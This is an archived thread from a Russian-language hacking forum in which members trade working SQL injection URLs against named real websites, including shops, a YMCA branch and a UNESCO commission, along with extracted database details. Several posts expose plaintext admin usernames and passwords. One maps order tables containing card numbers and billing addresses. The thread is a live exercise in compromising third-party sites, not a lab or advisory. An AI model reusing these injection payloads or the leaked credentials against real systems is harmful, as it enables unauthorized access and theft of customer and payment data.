ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9481  
Старый 23.05.2009, 14:12
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

PR 1
Цитата:
http://pirotex.ru/content.php?id=-23'+union+select+version()+from+news/*'
Вывод в <title> 4й ветка бд. таблицы ни одной не нашел
логин -1' or 1=1/*'
пас любой



jokester: ethaicd.com БОЯН, не нужно восстанавливать то, что я стираю

Последний раз редактировалось jokester; 23.05.2009 в 16:58.. Причина: ethaicd.com БОЯН
 
Ответить с цитированием

  #9482  
Старый 23.05.2009, 14:33
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.calcatinge.ro/index.php?idCategorie=47+UNION+SELECT+AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er(),@@version_compile_os),0x71),0x71),2--%20&lang=ro

Database Version: 5.0.77
Database name: calcat_calcatinge
User name: calcat_root@localhost
Os: portbld-freebsd6.2
 
Ответить с цитированием

  #9483  
Старый 23.05.2009, 14:49
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

Цитата:
http://www.mintakafoundation.org/projet.php?id=-1+union+select+1,2,concat_ws(0x20,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
version 5.0.67-log
user mintakaDB@imu139.infomaniak.ch
database mintakafoundationorg
 
Ответить с цитированием

  #9484  
Старый 23.05.2009, 16:37
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

PR 3

Код:
http://www.globus.naztrans.ru/CityInfo.php?Number=-9600+union+select+concat_ws(0x202d20,version(),user(),database(),@@version_compile_os),2,3,4,5
user() - karalex_georg@localhost
version() - 5.0.67-community
database() - karalex_globus
os - redhat-linux-gnu


В бд ничего интересного...
Список автомобилей, фото иды, коменты, новости.

cities
authors
gallereies
news
pages
photos
results
usercoments
video
etc...

Последний раз редактировалось Krist_ALL; 23.05.2009 в 16:41..
 
Ответить с цитированием

  #9485  
Старый 23.05.2009, 17:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.mysupermarket.ro/produse.php?pID=227+union+select+1,2,3,4,concat_ws (0x3a,version(),database(),user(),@@version_compil e_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ limit+1,1

Database Version: 5.0.27
Database name: db_mysupermarketro
User name: mysupermarketro@localhost
Os: redhat-linux-gnu



http://www.mysupermarket.ro/produse.php?pID=227+UNION+SELECT+1,2,3,4,(SELECT+C ONCAT_ws(0x3a,aUsername,aPassword,aemail)+FROM+db_ mysupermarketro.Account+LIMIT+x,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+li mit+1,1
 
Ответить с цитированием

  #9486  
Старый 23.05.2009, 17:20
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

ПР4
http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness
 
Ответить с цитированием

  #9487  
Старый 23.05.2009, 17:27
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness
 
Ответить с цитированием

Unesco Romania
  #9488  
Старый 23.05.2009, 17:39
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Unesco Romania

http://www.cnr-unesco.ro/ro/stire.php?id=-121+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11/*


Database Version: 4.1.22
Database name: tibiq_unesco
User name: tibiq_unesco@localhost
Os: redhat-linux-gnu
 
Ответить с цитированием

  #9489  
Старый 23.05.2009, 18:23
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 3]
Код:
http://www.timeshare-obmen.ru/bonus.php?id=-3448449+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13--
5.0.26-log:timeshareb:timeshareb@localhost

[PR 3]
Код:
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,2,concat_ws(0x3a,version(),database(),user())--&lang=en
5.0.51a-community:piyanas_db:piyanas_piyanas@localhost
Код:
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(table_name),3+from+information_schema.tables--&lang=en
Цитата:
ilo_administrator_user
Код:
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x696c6f5f61646d696e6973747261746f725f75736572--&lang=en
columns from table ilo_administrator_user
Цитата:
administrator_id,username,password,menu1,menu2,men u3,menu4,menu5,menu6,menu9,description
Код:
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,concat_ws(0x3a,administrator_id,username,password),3+from+ilo_administrator_user--&lang=en
administrator_id,username,password
Цитата:
1:admin:py9999
2:sale:1234
3:manager:1234
 
Ответить с цитированием

  #9490  
Старый 23.05.2009, 19:01
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
Провел на форуме:
59923

Репутация: 65
По умолчанию

ШОП http://store.yeproc.com

_http://www.yeproc.com/upload/media/view_media.php?id=-459+union+select+1,2,3,user(),version(),6,7,8,9,10 ,11,12,13,14,15,16,17--

Код:
189 :In database redeyedb found table store_fixes_recreate_orders
  0 :   username
  1 :   full_name
  2 :   email
  3 :   order_number
  4 :   order_date
  5 :   order_date_time
  6 :   order_shipping
  7 :   order_tax
  8 :   order_total
  9 :   card_number
  10 :   product_id
  11 :   item_number
  12 :   product_type
  13 :   description
  14 :   artist_name
  15 :   value_add_flag
  16 :   quantity
  17 :   unit_price
  18 :   line_total
  19 :   bill_name_first
  20 :   bill_name_last
  21 :   bill_address1
  22 :   bill_address2
  23 :   bill_address3
  24 :   bill_city
  25 :   bill_state
  26 :   bill_postal_code
  27 :   bill_country
  28 :   bill_phone
  29 :   ship_name_first
  30 :   ship_name_last
  31 :   ship_address1
  32 :   ship_address2
  33 :   ship_address3
  34 :   ship_city
  35 :   ship_state
  36 :   ship_postal_code
  37 :   ship_country
  38 :   ship_phone
и вторая бд.
Код:
214 :In database redeyedb found table store_order
  0 :   id
  1 :   id_store
  2 :   id_store_user
  3 :   session_id
  4 :   order_number
  5 :   order_date
  6 :   subtotal
  7 :   tax
  8 :   shipping
  9 :   total
  10 :   card_type
  11 :   card_number
  12 :   card_expiration
  13 :   card_name
  14 :   bill_name_first
  15 :   bill_name_last
  16 :   bill_address1
  17 :   bill_address2
  18 :   bill_address3
  19 :   bill_city
  20 :   bill_state
  21 :   bill_postal_code
  22 :   bill_country
  23 :   bill_phone
  24 :   ship_name_first
  25 :   ship_name_last
  26 :   ship_address1
  27 :   ship_address2
  28 :   ship_address3
  29 :   ship_city
  30 :   ship_state
  31 :   ship_postal_code
  32 :   ship_country
  33 :   ship_phone
  34 :   facts_export_id
  35 :   digital_export_id

Последний раз редактировалось jokester; 23.05.2009 в 19:55.. Причина: 2008.rif.ru БОЯН
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ